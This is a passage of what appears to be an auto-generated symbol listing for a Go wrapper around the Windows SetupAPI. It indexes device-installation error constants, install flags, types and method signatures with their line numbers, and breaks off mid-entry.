ERROR_NO_CLASS_DRIVER_LIST (line 56) | ERROR_NO_CLASS_DRIVER_LIST Errno = 0x20000000 | 0xC000... constant ERROR_NO_ASSOCIATED_SERVICE (line 57) | ERROR_NO_ASSOCIATED_SERVICE Errno = 0x20000000 | 0xC000... constant ERROR_NO_DEFAULT_DEVICE_INTERFACE (line 58) | ERROR_NO_DEFAULT_DEVICE_INTERFACE Errno = 0x20000000 | 0xC000... constant ERROR_DEVICE_INTERFACE_ACTIVE (line 59) | ERROR_DEVICE_INTERFACE_ACTIVE Errno = 0x20000000 | 0xC000... constant ERROR_DEVICE_INTERFACE_REMOVED (line 60) | ERROR_DEVICE_INTERFACE_REMOVED Errno = 0x20000000 | 0xC000... constant ERROR_BAD_INTERFACE_INSTALLSECT (line 61) | ERROR_BAD_INTERFACE_INSTALLSECT Errno = 0x20000000 | 0xC000... constant ERROR_NO_SUCH_INTERFACE_CLASS (line 62) | ERROR_NO_SUCH_INTERFACE_CLASS Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_REFERENCE_STRING (line 63) | ERROR_INVALID_REFERENCE_STRING Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_MACHINENAME (line 64) | ERROR_INVALID_MACHINENAME Errno = 0x20000000 | 0xC000... constant ERROR_REMOTE_COMM_FAILURE (line 65) | ERROR_REMOTE_COMM_FAILURE Errno = 0x20000000 | 0xC000... constant ERROR_MACHINE_UNAVAILABLE (line 66) | ERROR_MACHINE_UNAVAILABLE Errno = 0x20000000 | 0xC000... constant ERROR_NO_CONFIGMGR_SERVICES (line 67) | ERROR_NO_CONFIGMGR_SERVICES Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_PROPPAGE_PROVIDER (line 68) | ERROR_INVALID_PROPPAGE_PROVIDER Errno = 0x20000000 | 0xC000... constant ERROR_NO_SUCH_DEVICE_INTERFACE (line 69) | ERROR_NO_SUCH_DEVICE_INTERFACE Errno = 0x20000000 | 0xC000... constant ERROR_DI_POSTPROCESSING_REQUIRED (line 70) | ERROR_DI_POSTPROCESSING_REQUIRED Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_COINSTALLER (line 71) | ERROR_INVALID_COINSTALLER Errno = 0x20000000 | 0xC000... constant ERROR_NO_COMPAT_DRIVERS (line 72) | ERROR_NO_COMPAT_DRIVERS Errno = 0x20000000 | 0xC000... constant ERROR_NO_DEVICE_ICON (line 73) | ERROR_NO_DEVICE_ICON Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_INF_LOGCONFIG (line 74) | ERROR_INVALID_INF_LOGCONFIG Errno = 0x20000000 | 0xC000... constant ERROR_DI_DONT_INSTALL (line 75) | ERROR_DI_DONT_INSTALL Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_FILTER_DRIVER (line 76) | ERROR_INVALID_FILTER_DRIVER Errno = 0x20000000 | 0xC000... constant ERROR_NON_WINDOWS_NT_DRIVER (line 77) | ERROR_NON_WINDOWS_NT_DRIVER Errno = 0x20000000 | 0xC000... constant ERROR_NON_WINDOWS_DRIVER (line 78) | ERROR_NON_WINDOWS_DRIVER Errno = 0x20000000 | 0xC000... constant ERROR_NO_CATALOG_FOR_OEM_INF (line 79) | ERROR_NO_CATALOG_FOR_OEM_INF Errno = 0x20000000 | 0xC000... constant ERROR_DEVINSTALL_QUEUE_NONNATIVE (line 80) | ERROR_DEVINSTALL_QUEUE_NONNATIVE Errno = 0x20000000 | 0xC000... constant ERROR_NOT_DISABLEABLE (line 81) | ERROR_NOT_DISABLEABLE Errno = 0x20000000 | 0xC000... constant ERROR_CANT_REMOVE_DEVINST (line 82) | ERROR_CANT_REMOVE_DEVINST Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_TARGET (line 83) | ERROR_INVALID_TARGET Errno = 0x20000000 | 0xC000... constant ERROR_DRIVER_NONNATIVE (line 84) | ERROR_DRIVER_NONNATIVE Errno = 0x20000000 | 0xC000... constant ERROR_IN_WOW64 (line 85) | ERROR_IN_WOW64 Errno = 0x20000000 | 0xC000... constant ERROR_SET_SYSTEM_RESTORE_POINT (line 86) | ERROR_SET_SYSTEM_RESTORE_POINT Errno = 0x20000000 | 0xC000... constant ERROR_SCE_DISABLED (line 87) | ERROR_SCE_DISABLED Errno = 0x20000000 | 0xC000... constant ERROR_UNKNOWN_EXCEPTION (line 88) | ERROR_UNKNOWN_EXCEPTION Errno = 0x20000000 | 0xC000... constant ERROR_PNP_REGISTRY_ERROR (line 89) | ERROR_PNP_REGISTRY_ERROR Errno = 0x20000000 | 0xC000... constant ERROR_REMOTE_REQUEST_UNSUPPORTED (line 90) | ERROR_REMOTE_REQUEST_UNSUPPORTED Errno = 0x20000000 | 0xC000... constant ERROR_NOT_AN_INSTALLED_OEM_INF (line 91) | ERROR_NOT_AN_INSTALLED_OEM_INF Errno = 0x20000000 | 0xC000... constant ERROR_INF_IN_USE_BY_DEVICES (line 92) | ERROR_INF_IN_USE_BY_DEVICES Errno = 0x20000000 | 0xC000... constant ERROR_DI_FUNCTION_OBSOLETE (line 93) | ERROR_DI_FUNCTION_OBSOLETE Errno = 0x20000000 | 0xC000... constant ERROR_NO_AUTHENTICODE_CATALOG (line 94) | ERROR_NO_AUTHENTICODE_CATALOG Errno = 0x20000000 | 0xC000... constant ERROR_AUTHENTICODE_DISALLOWED (line 95) | ERROR_AUTHENTICODE_DISALLOWED Errno = 0x20000000 | 0xC000... constant ERROR_AUTHENTICODE_TRUSTED_PUBLISHER (line 96) | ERROR_AUTHENTICODE_TRUSTED_PUBLISHER Errno = 0x20000000 | 0xC000... constant ERROR_AUTHENTICODE_TRUST_NOT_ESTABLISHED (line 97) | ERROR_AUTHENTICODE_TRUST_NOT_ESTABLISHED Errno = 0x20000000 | 0xC000... constant ERROR_AUTHENTICODE_PUBLISHER_NOT_TRUSTED (line 98) | ERROR_AUTHENTICODE_PUBLISHER_NOT_TRUSTED Errno = 0x20000000 | 0xC000... constant ERROR_SIGNATURE_OSATTRIBUTE_MISMATCH (line 99) | ERROR_SIGNATURE_OSATTRIBUTE_MISMATCH Errno = 0x20000000 | 0xC000... constant ERROR_ONLY_VALIDATE_VIA_AUTHENTICODE (line 100) | ERROR_ONLY_VALIDATE_VIA_AUTHENTICODE Errno = 0x20000000 | 0xC000... constant ERROR_DEVICE_INSTALLER_NOT_READY (line 101) | ERROR_DEVICE_INSTALLER_NOT_READY Errno = 0x20000000 | 0xC000... constant ERROR_DRIVER_STORE_ADD_FAILED (line 102) | ERROR_DRIVER_STORE_ADD_FAILED Errno = 0x20000000 | 0xC000... constant ERROR_DEVICE_INSTALL_BLOCKED (line 103) | ERROR_DEVICE_INSTALL_BLOCKED Errno = 0x20000000 | 0xC000... constant ERROR_DRIVER_INSTALL_BLOCKED (line 104) | ERROR_DRIVER_INSTALL_BLOCKED Errno = 0x20000000 | 0xC000... constant ERROR_WRONG_INF_TYPE (line 105) | ERROR_WRONG_INF_TYPE Errno = 0x20000000 | 0xC000... constant ERROR_FILE_HASH_NOT_IN_CATALOG (line 106) | ERROR_FILE_HASH_NOT_IN_CATALOG Errno = 0x20000000 | 0xC000... constant ERROR_DRIVER_STORE_DELETE_FAILED (line 107) | ERROR_DRIVER_STORE_DELETE_FAILED Errno = 0x20000000 | 0xC000... constant ERROR_UNRECOVERABLE_STACK_OVERFLOW (line 108) | ERROR_UNRECOVERABLE_STACK_OVERFLOW Errno = 0x20000000 | 0xC000... constant EXCEPTION_SPAPI_UNRECOVERABLE_STACK_OVERFLOW (line 109) | EXCEPTION_SPAPI_UNRECOVERABLE_STACK_OVERFLOW Errno = ERROR_UNRECOVERABLE... constant ERROR_NO_DEFAULT_INTERFACE_DEVICE (line 110) | ERROR_NO_DEFAULT_INTERFACE_DEVICE Errno = ERROR_NO_DEFAULT_DE... constant ERROR_INTERFACE_DEVICE_ACTIVE (line 111) | ERROR_INTERFACE_DEVICE_ACTIVE Errno = ERROR_DEVICE_INTERF... constant ERROR_INTERFACE_DEVICE_REMOVED (line 112) | ERROR_INTERFACE_DEVICE_REMOVED Errno = ERROR_DEVICE_INTERF... constant ERROR_NO_SUCH_INTERFACE_DEVICE (line 113) | ERROR_NO_SUCH_INTERFACE_DEVICE Errno = ERROR_NO_SUCH_DEVIC... constant MAX_DEVICE_ID_LEN (line 117) | MAX_DEVICE_ID_LEN = 200 constant MAX_DEVNODE_ID_LEN (line 118) | MAX_DEVNODE_ID_LEN = MAX_DEVICE_ID_LEN constant MAX_GUID_STRING_LEN (line 119) | MAX_GUID_STRING_LEN = 39 constant MAX_CLASS_NAME_LEN (line 120) | MAX_CLASS_NAME_LEN = 32 constant MAX_PROFILE_LEN (line 121) | MAX_PROFILE_LEN = 80 constant MAX_CONFIG_VALUE (line 122) | MAX_CONFIG_VALUE = 9999 constant MAX_INSTANCE_VALUE (line 123) | MAX_INSTANCE_VALUE = 9999 constant CONFIGMG_VERSION (line 124) | CONFIGMG_VERSION = 0x0400 constant LINE_LEN (line 129) | LINE_LEN = 256 constant MAX_INF_STRING_LENGTH (line 130) | MAX_INF_STRING_LENGTH = 4096 constant MAX_INF_SECTION_NAME_LENGTH (line 131) | MAX_INF_SECTION_NAME_LENGTH = 255 constant MAX_TITLE_LEN (line 132) | MAX_TITLE_LEN = 60 constant MAX_INSTRUCTION_LEN (line 133) | MAX_INSTRUCTION_LEN = 256 constant MAX_LABEL_LEN (line 134) | MAX_LABEL_LEN = 30 constant MAX_SERVICE_NAME_LEN (line 135) | MAX_SERVICE_NAME_LEN = 256 constant MAX_SUBTITLE_LEN (line 136) | MAX_SUBTITLE_LEN = 256 constant SP_MAX_MACHINENAME_LENGTH (line 141) | SP_MAX_MACHINENAME_LENGTH = MAX_PATH + 3 type HSPFILEQ (line 145) | type HSPFILEQ type DevInfo (line 148) | type DevInfo method DeviceInfoListDetail (line 903) | func (deviceInfoSet DevInfo) DeviceInfoListDetail() (*DevInfoListDetai... method CreateDeviceInfo (line 931) | func (deviceInfoSet DevInfo) CreateDeviceInfo(deviceName string, class... method EnumDeviceInfo (line 946) | func (deviceInfoSet DevInfo) EnumDeviceInfo(memberIndex int) (*DevInfo... method Close (line 954) | func (deviceInfoSet DevInfo) Close() error { method BuildDriverInfoList (line 961) | func (deviceInfoSet DevInfo) BuildDriverInfoList(deviceInfoData *DevIn... method CancelDriverInfoSearch (line 968) | func (deviceInfoSet DevInfo) CancelDriverInfoSearch() error { method EnumDriverInfo (line 983) | func (deviceInfoSet DevInfo) EnumDriverInfo(deviceInfoData *DevInfoDat... method SelectedDriver (line 998) | func (deviceInfoSet DevInfo) SelectedDriver(deviceInfoData *DevInfoDat... method SetSelectedDriver (line 1005) | func (deviceInfoSet DevInfo) SetSelectedDriver(deviceInfoData *DevInfo... method DriverInfoDetail (line 1031) | func (deviceInfoSet DevInfo) DriverInfoDetail(deviceInfoData *DevInfoD... method DestroyDriverInfoList (line 1038) | func (deviceInfoSet DevInfo) DestroyDriverInfoList(deviceInfoData *Dev... method CallClassInstaller (line 1067) | func (deviceInfoSet DevInfo) CallClassInstaller(installFunction DI_FUN... method OpenDevRegKey (line 1075) | func (deviceInfoSet DevInfo) OpenDevRegKey(DeviceInfoData *DevInfoData... method DeviceRegistryProperty (line 1204) | func (deviceInfoSet DevInfo) DeviceRegistryProperty(deviceInfoData *De... method SetDeviceRegistryProperty (line 1216) | func (deviceInfoSet DevInfo) SetDeviceRegistryProperty(deviceInfoData ... method SetDeviceRegistryPropertyString (line 1221) | func (deviceInfoSet DevInfo) SetDeviceRegistryPropertyString(deviceInf... method DeviceInstallParams (line 1242) | func (deviceInfoSet DevInfo) DeviceInstallParams(deviceInfoData *DevIn... method DeviceInstanceID (line 1265) | func (deviceInfoSet DevInfo) DeviceInstanceID(deviceInfoData *DevInfoD... method ClassInstallParams (line 1273) | func (deviceInfoSet DevInfo) ClassInstallParams(deviceInfoData *DevInf... method SetDeviceInstallParams (line 1280) | func (deviceInfoSet DevInfo) SetDeviceInstallParams(deviceInfoData *De... method SetClassInstallParams (line 1288) | func (deviceInfoSet DevInfo) SetClassInstallParams(deviceInfoData *Dev... method SelectedDevice (line 1357) | func (deviceInfoSet DevInfo) SelectedDevice() (*DevInfoData, error) { method SetSelectedDevice (line 1365) | func (deviceInfoSet DevInfo) SetSelectedDevice(deviceInfoData *DevInfo... type DEVINST (line 151) | type DEVINST type DevInfoData (line 154) | type DevInfoData struct type DevInfoListDetailData (line 162) | type DevInfoListDetailData struct method unsafeSizeOf (line 169) | func (*DevInfoListDetailData) unsafeSizeOf() uint32 { method RemoteMachineName (line 177) | func (data *DevInfoListDetailData) RemoteMachineName() string { method SetRemoteMachineName (line 181) | func (data *DevInfoListDetailData) SetRemoteMachineName(remoteMachineN... type DI_FUNCTION (line 191) | type DI_FUNCTION constant DIF_SELECTDEVICE (line 194) | DIF_SELECTDEVICE DI_FUNCTION = 0x00000001 constant DIF_INSTALLDEVICE (line 195) | DIF_INSTALLDEVICE DI_FUNCTION = 0x00000002 constant DIF_ASSIGNRESOURCES (line 196) | DIF_ASSIGNRESOURCES DI_FUNCTION = 0x00000003 constant DIF_PROPERTIES (line 197) | DIF_PROPERTIES DI_FUNCTION = 0x00000004 constant DIF_REMOVE (line 198) | DIF_REMOVE DI_FUNCTION = 0x00000005 constant DIF_FIRSTTIMESETUP (line 199) | DIF_FIRSTTIMESETUP DI_FUNCTION = 0x00000006 constant DIF_FOUNDDEVICE (line 200) | DIF_FOUNDDEVICE DI_FUNCTION = 0x00000007 constant DIF_SELECTCLASSDRIVERS (line 201) | DIF_SELECTCLASSDRIVERS DI_FUNCTION = 0x00000008 constant DIF_VALIDATECLASSDRIVERS (line 202) | DIF_VALIDATECLASSDRIVERS DI_FUNCTION = 0x00000009 constant DIF_INSTALLCLASSDRIVERS (line 203) | DIF_INSTALLCLASSDRIVERS DI_FUNCTION = 0x0000000A constant DIF_CALCDISKSPACE (line 204) | DIF_CALCDISKSPACE DI_FUNCTION = 0x0000000B constant DIF_DESTROYPRIVATEDATA (line 205) | DIF_DESTROYPRIVATEDATA DI_FUNCTION = 0x0000000C constant DIF_VALIDATEDRIVER (line 206) | DIF_VALIDATEDRIVER DI_FUNCTION = 0x0000000D constant DIF_DETECT (line 207) | DIF_DETECT DI_FUNCTION = 0x0000000F constant DIF_INSTALLWIZARD (line 208) | DIF_INSTALLWIZARD DI_FUNCTION = 0x00000010 constant DIF_DESTROYWIZARDDATA (line 209) | DIF_DESTROYWIZARDDATA DI_FUNCTION = 0x00000011 constant DIF_PROPERTYCHANGE (line 210) | DIF_PROPERTYCHANGE DI_FUNCTION = 0x00000012 constant DIF_ENABLECLASS (line 211) | DIF_ENABLECLASS DI_FUNCTION = 0x00000013 constant DIF_DETECTVERIFY (line 212) | DIF_DETECTVERIFY DI_FUNCTION = 0x00000014 constant DIF_INSTALLDEVICEFILES (line 213) | DIF_INSTALLDEVICEFILES DI_FUNCTION = 0x00000015 constant DIF_UNREMOVE (line 214) | DIF_UNREMOVE DI_FUNCTION = 0x00000016 constant DIF_SELECTBESTCOMPATDRV (line 215) | DIF_SELECTBESTCOMPATDRV DI_FUNCTION = 0x00000017 constant DIF_ALLOW_INSTALL (line 216) | DIF_ALLOW_INSTALL DI_FUNCTION = 0x00000018 constant DIF_REGISTERDEVICE (line 217) | DIF_REGISTERDEVICE DI_FUNCTION = 0x00000019 constant DIF_NEWDEVICEWIZARD_PRESELECT (line 218) | DIF_NEWDEVICEWIZARD_PRESELECT DI_FUNCTION = 0x0000001A constant DIF_NEWDEVICEWIZARD_SELECT (line 219) | DIF_NEWDEVICEWIZARD_SELECT DI_FUNCTION = 0x0000001B constant DIF_NEWDEVICEWIZARD_PREANALYZE (line 220) | DIF_NEWDEVICEWIZARD_PREANALYZE DI_FUNCTION = 0x0000001C constant DIF_NEWDEVICEWIZARD_POSTANALYZE (line 221) | DIF_NEWDEVICEWIZARD_POSTANALYZE DI_FUNCTION = 0x0000001D constant DIF_NEWDEVICEWIZARD_FINISHINSTALL (line 222) | DIF_NEWDEVICEWIZARD_FINISHINSTALL DI_FUNCTION = 0x0000001E constant DIF_INSTALLINTERFACES (line 223) | DIF_INSTALLINTERFACES DI_FUNCTION = 0x00000020 constant DIF_DETECTCANCEL (line 224) | DIF_DETECTCANCEL DI_FUNCTION = 0x00000021 constant DIF_REGISTER_COINSTALLERS (line 225) | DIF_REGISTER_COINSTALLERS DI_FUNCTION = 0x00000022 constant DIF_ADDPROPERTYPAGE_ADVANCED (line 226) | DIF_ADDPROPERTYPAGE_ADVANCED DI_FUNCTION = 0x00000023 constant DIF_ADDPROPERTYPAGE_BASIC (line 227) | DIF_ADDPROPERTYPAGE_BASIC DI_FUNCTION = 0x00000024 constant DIF_TROUBLESHOOTER (line 228) | DIF_TROUBLESHOOTER DI_FUNCTION = 0x00000026 constant DIF_POWERMESSAGEWAKE (line 229) | DIF_POWERMESSAGEWAKE DI_FUNCTION = 0x00000027 constant DIF_ADDREMOTEPROPERTYPAGE_ADVANCED (line 230) | DIF_ADDREMOTEPROPERTYPAGE_ADVANCED DI_FUNCTION = 0x00000028 constant DIF_UPDATEDRIVER_UI (line 231) | DIF_UPDATEDRIVER_UI DI_FUNCTION = 0x00000029 constant DIF_FINISHINSTALL_ACTION (line 232) | DIF_FINISHINSTALL_ACTION DI_FUNCTION = 0x0000002A type DevInstallParams (line 236) | type DevInstallParams struct method DriverPath (line 249) | func (params *DevInstallParams) DriverPath() string { method SetDriverPath (line 253) | func (params *DevInstallParams) SetDriverPath(driverPath string) error { type DI_FLAGS (line 263) | type DI_FLAGS constant DI_SHOWOEM (line 267) | DI_SHOWOEM DI_FLAGS = 0x00000001 constant DI_SHOWCOMPAT (line 268) | DI_SHOWCOMPAT DI_FLAGS = 0x00000002 constant DI_SHOWCLASS (line 269) | DI_SHOWCLASS DI_FLAGS = 0x00000004 constant DI_SHOWALL (line 270) | DI_SHOWALL DI_FLAGS = 0x00000007 constant DI_NOVCP (line 271) | DI_NOVCP DI_FLAGS = 0x00000008 constant DI_DIDCOMPAT (line 272) | DI_DIDCOMPAT DI_FLAGS = 0x00000010 constant DI_DIDCLASS (line 273) | DI_DIDCLASS DI_FLAGS = 0x00000020 constant DI_AUTOASSIGNRES (line 274) | DI_AUTOASSIGNRES DI_FLAGS = 0x00000040 constant DI_NEEDRESTART (line 277) | DI_NEEDRESTART DI_FLAGS = 0x00000080 constant DI_NEEDREBOOT (line 278) | DI_NEEDREBOOT DI_FLAGS = 0x00000100 constant DI_NOBROWSE (line 281) | DI_NOBROWSE DI_FLAGS = 0x00000200 constant DI_MULTMFGS (line 284) | DI_MULTMFGS DI_FLAGS = 0x00000400 constant DI_DISABLED (line 287) | DI_DISABLED DI_FLAGS = 0x00000800 constant DI_GENERALPAGE_ADDED (line 290) | DI_GENERALPAGE_ADDED DI_FLAGS = 0x00001000 constant DI_RESOURCEPAGE_ADDED (line 291) | DI_RESOURCEPAGE_ADDED DI_FLAGS = 0x00002000 constant DI_PROPERTIES_CHANGE (line 294) | DI_PROPERTIES_CHANGE DI_FLAGS = 0x00004000 constant DI_INF_IS_SORTED (line 297) | DI_INF_IS_SORTED DI_FLAGS = 0x00008000 constant DI_ENUMSINGLEINF (line 300) | DI_ENUMSINGLEINF DI_FLAGS = 0x00010000 constant DI_DONOTCALLCONFIGMG (line 304) | DI_DONOTCALLCONFIGMG DI_FLAGS = 0x00020000 constant DI_INSTALLDISABLED (line 307) | DI_INSTALLDISABLED DI_FLAGS = 0x00040000 constant DI_COMPAT_FROM_CLASS (line 311) | DI_COMPAT_FROM_CLASS DI_FLAGS = 0x00080000 constant DI_CLASSINSTALLPARAMS (line 314) | DI_CLASSINSTALLPARAMS DI_FLAGS = 0x00100000 constant DI_NODI_DEFAULTACTION (line 317) | DI_NODI_DEFAULTACTION DI_FLAGS = 0x00200000 constant DI_QUIETINSTALL (line 320) | DI_QUIETINSTALL DI_FLAGS = 0x00800000 constant DI_NOFILECOPY (line 321) | DI_NOFILECOPY DI_FLAGS = 0x01000000 constant DI_FORCECOPY (line 322) | DI_FORCECOPY DI_FLAGS = 0x02000000 constant DI_DRIVERPAGE_ADDED (line 323) | DI_DRIVERPAGE_ADDED DI_FLAGS = 0x04000000 constant DI_USECI_SELECTSTRINGS (line 324) | DI_USECI_SELECTSTRINGS DI_FLAGS = 0x08000000 constant DI_OVERRIDE_INFFLAGS (line 325) | DI_OVERRIDE_INFFLAGS DI_FLAGS = 0x10000000 constant DI_PROPS_NOCHANGEUSAGE (line 326) | DI_PROPS_NOCHANGEUSAGE DI_FLAGS = 0x20000000 constant DI_NOSELECTICONS (line 328) | DI_NOSELECTICONS DI_FLAGS = 0x40000000 constant DI_NOWRITE_IDS (line 330) | DI_NOWRITE_IDS DI_FLAGS = 0x80000000 type DI_FLAGSEX (line 334) | type DI_FLAGSEX constant DI_FLAGSEX_CI_FAILED (line 337) | DI_FLAGSEX_CI_FAILED DI_FLAGSEX = 0x00000004 constant DI_FLAGSEX_FINISHINSTALL_ACTION (line 338) | DI_FLAGSEX_FINISHINSTALL_ACTION DI_FLAGSEX = 0x00000008 constant DI_FLAGSEX_DIDINFOLIST (line 339) | DI_FLAGSEX_DIDINFOLIST DI_FLAGSEX = 0x00000010 constant DI_FLAGSEX_DIDCOMPATINFO (line 340) | DI_FLAGSEX_DIDCOMPATINFO DI_FLAGSEX = 0x00000020 constant DI_FLAGSEX_FILTERCLASSES (line 341) | DI_FLAGSEX_FILTERCLASSES DI_FLAGSEX = 0x00000040 constant DI_FLAGSEX_SETFAILEDINSTALL (line 342) | DI_FLAGSEX_SETFAILEDINSTALL DI_FLAGSEX = 0x00000080 constant DI_FLAGSEX_DEVICECHANGE (line 343) | DI_FLAGSEX_DEVICECHANGE DI_FLAGSEX = 0x00000100 constant DI_FLAGSEX_ALWAYSWRITEIDS (line 344) | DI_FLAGSEX_ALWAYSWRITEIDS DI_FLAGSEX = 0x00000200 constant DI_FLAGSEX_PROPCHANGE_PENDING (line 345) | DI_FLAGSEX_PROPCHANGE_PENDING DI_FLAGSEX = 0x00000400 constant DI_FLAGSEX_ALLOWEXCLUDEDDRVS (line 346) | DI_FLAGSEX_ALLOWEXCLUDEDDRVS DI_FLAGSEX = 0x00000800 constant DI_FLAGSEX_NOUIONQUERYREMOVE (line 347) | DI_FLAGSEX_NOUIONQUERYREMOVE DI_FLAGSEX = 0x00001000 constant DI_FLAGSEX_USECLASSFORCOMPAT (line 348) | DI_FLAGSEX_USECLASSFORCOMPAT DI_FLAGSEX = 0x00002000 constant DI_FLAGSEX_NO_DRVREG_MODIFY (line 349) | DI_FLAGSEX_NO_DRVREG_MODIFY DI_FLAGSEX = 0x00008000 constant DI_FLAGSEX_IN_SYSTEM_SETUP (line 350) | DI_FLAGSEX_IN_SYSTEM_SETUP DI_FLAGSEX = 0x00010000 constant DI_FLAGSEX_INET_DRIVER (line 351) | DI_FLAGSEX_INET_DRIVER DI_FLAGSEX = 0x00020000 constant DI_FLAGSEX_APPENDDRIVERLIST (line 352) | DI_FLAGSEX_APPENDDRIVERLIST DI_FLAGSEX = 0x00040000 constant DI_FLAGSEX_PREINSTALLBACKUP (line 353) | DI_FLAGSEX_PREINSTALLBACKUP DI_FLAGSEX = 0x00080000 constant DI_FLAGSEX_BACKUPONREPLACE (line 354) | DI_FLAGSEX_BACKUPONREPLACE DI_FLAGSEX = 0x00100000 constant DI_FLAGSEX_DRIVERLIST_FROM_URL (line 355) | DI_FLAGSEX_DRIVERLIST_FROM_URL DI_FLAGSEX = 0x00200000 constant DI_FLAGSEX_EXCLUDE_OLD_INET_DRIVERS (line 356) | DI_FLAGSEX_EXCLUDE_OLD_INET_DRIVERS DI_FLAGSEX = 0x00800000 constant DI_FLAGSEX_POWERPAGE_ADDED (line 357) | DI_FLAGSEX_POWERPAGE_ADDED DI_FLAGSEX = 0x01000000 constant DI_FLAGSEX_FILTERSIMILARDRIVERS (line 358) | DI_FLAGSEX_FILTERSIMILARDRIVERS DI_FLAGSEX = 0x02000000 constant DI_FLAGSEX_INSTALLEDDRIVER (line 359) | DI_FLAGSEX_INSTALLEDDRIVER DI_FLAGSEX = 0x04000000 constant DI_FLAGSEX_NO_CLASSLIST_NODE_MERGE (line 360) | DI_FLAGSEX_NO_CLASSLIST_NODE_MERGE DI_FLAGSEX = 0x08000000 constant DI_FLAGSEX_ALTPLATFORM_DRVSEARCH (line 361) | DI_FLAGSEX_ALTPLATFORM_DRVSEARCH DI_FLAGSEX = 0x10000000 constant DI_FLAGSEX_RESTART_DEVICE_ONLY (line 362) | DI_FLAGSEX_RESTART_DEVICE_ONLY DI_FLAGSEX = 0x20000000 constant DI_FLAGSEX_RECURSIVESEARCH (line 363) | DI_FLAGSEX_RECURSIVESEARCH DI_FLAGSEX = 0x40000000 constant DI_FLAGSEX_SEARCH_PUBLISHED_INFS (line 364) | DI_FLAGSEX_SEARCH_PUBLISHED_INFS DI_FLAGSEX = 0x80000000 type ClassInstallHeader (line 368) | type ClassInstallHeader struct function MakeClassInstallHeader (line 373) | func MakeClassInstallHeader(installFunction DI_FUNCTION) *ClassInstallHe... type DICS_STATE (line 380) | type DICS_STATE constant DICS_ENABLE (line 383) | DICS_ENABLE DICS_STATE = 0x00000001 constant DICS_DISABLE (line 384) | DICS_DISABLE DICS_STATE = 0x00000002 constant DICS_PROPCHANGE (line 385) | DICS_PROPCHANGE DICS_STATE = 0x00000003 constant DICS_START (line 386) | DICS_START DICS_STATE = 0x00000004 constant DICS_STOP (line 387) | DICS_STOP DICS_STATE = 0x00000005 type DICS_FLAG (line 391) | type DICS_FLAG constant DICS_FLAG_GLOBAL (line 394) | DICS_FLAG_GLOBAL DICS_FLAG = 0x00000001 constant DICS_FLAG_CONFIGSPECIFIC (line 395) | DICS_FLAG_CONFIGSPECIFIC DICS_FLAG = 0x00000002 constant DICS_FLAG_CONFIGGENERAL (line 396) | DICS_FLAG_CONFIGGENERAL DICS_FLAG = 0x00000004 type PropChangeParams (line 400) | type PropChangeParams struct type DI_REMOVEDEVICE (line 408) | type DI_REMOVEDEVICE constant DI_REMOVEDEVICE_GLOBAL (line 411) | DI_REMOVEDEVICE_GLOBAL DI_REMOVEDEVICE = 0x00000001 constant DI_REMOVEDEVICE_CONFIGSPECIFIC (line 412) | DI_REMOVEDEVICE_CONFIGSPECIFIC DI_REMOVEDEVICE = 0x00000002 type RemoveDeviceParams (line 416) | type RemoveDeviceParams struct type DrvInfoData (line 423) | type DrvInfoData struct method Description (line 434) | func (data *DrvInfoData) Description() string { method SetDescription (line 438) | func (data *DrvInfoData) SetDescription(description string) error { method MfgName (line 447) | func (data *DrvInfoData) MfgName() string { method SetMfgName (line 451) | func (data *DrvInfoData) SetMfgName(mfgName string) error { method ProviderName (line 460) | func (data *DrvInfoData) ProviderName() string { method SetProviderName (line 464) | func (data *DrvInfoData) SetProviderName(providerName string) error { method IsNewer (line 474) | func (data *DrvInfoData) IsNewer(driverDate Filetime, driverVersion ui... type DrvInfoDetailData (line 500) | type DrvInfoDetailData struct method unsafeSizeOf (line 512) | func (*DrvInfoDetailData) unsafeSizeOf() uint32 { method SectionName (line 520) | func (data *DrvInfoDetailData) SectionName() string { method InfFileName (line 524) | func (data *DrvInfoDetailData) InfFileName() string { method DrvDescription (line 528) | func (data *DrvInfoDetailData) DrvDescription() string { method HardwareID (line 532) | func (data *DrvInfoDetailData) HardwareID() string { method CompatIDs (line 541) | func (data *DrvInfoDetailData) CompatIDs() []string { method getBuf (line 559) | func (data *DrvInfoDetailData) getBuf() []uint16 { method IsCompatible (line 570) | func (data *DrvInfoDetailData) IsCompatible(hwid string) bool { type DICD (line 586) | type DICD constant DICD_GENERATE_ID (line 589) | DICD_GENERATE_ID DICD = 0x00000001 constant DICD_INHERIT_CLASSDRVS (line 590) | DICD_INHERIT_CLASSDRVS DICD = 0x00000002 type SUOI (line 594) | type SUOI constant SUOI_FORCEDELETE (line 597) | SUOI_FORCEDELETE SUOI = 0x0001 type SPDIT (line 603) | type SPDIT constant SPDIT_NODRIVER (line 606) | SPDIT_NODRIVER SPDIT = 0x00000000 constant SPDIT_CLASSDRIVER (line 607) | SPDIT_CLASSDRIVER SPDIT = 0x00000001 constant SPDIT_COMPATDRIVER (line 608) | SPDIT_COMPATDRIVER SPDIT = 0x00000002 type DIGCF (line 612) | type DIGCF constant DIGCF_DEFAULT (line 615) | DIGCF_DEFAULT DIGCF = 0x00000001 constant DIGCF_PRESENT (line 616) | DIGCF_PRESENT DIGCF = 0x00000002 constant DIGCF_ALLCLASSES (line 617) | DIGCF_ALLCLASSES DIGCF = 0x00000004 constant DIGCF_PROFILE (line 618) | DIGCF_PROFILE DIGCF = 0x00000008 constant DIGCF_DEVICEINTERFACE (line 619) | DIGCF_DEVICEINTERFACE DIGCF = 0x00000010 type DIREG (line 623) | type DIREG constant DIREG_DEV (line 626) | DIREG_DEV DIREG = 0x00000001 constant DIREG_DRV (line 627) | DIREG_DRV DIREG = 0x00000002 constant DIREG_BOTH (line 628) | DIREG_BOTH DIREG = 0x00000004 type SPDRP (line 639) | type SPDRP constant SPDRP_DEVICEDESC (line 642) | SPDRP_DEVICEDESC SPDRP = 0x00000000 constant SPDRP_HARDWAREID (line 643) | SPDRP_HARDWAREID SPDRP = 0x00000001 constant SPDRP_COMPATIBLEIDS (line 644) | SPDRP_COMPATIBLEIDS SPDRP = 0x00000002 constant SPDRP_SERVICE (line 645) | SPDRP_SERVICE SPDRP = 0x00000004 constant SPDRP_CLASS (line 646) | SPDRP_CLASS SPDRP = 0x00000007 constant SPDRP_CLASSGUID (line 647) | SPDRP_CLASSGUID SPDRP = 0x00000008 constant SPDRP_DRIVER (line 648) | SPDRP_DRIVER SPDRP = 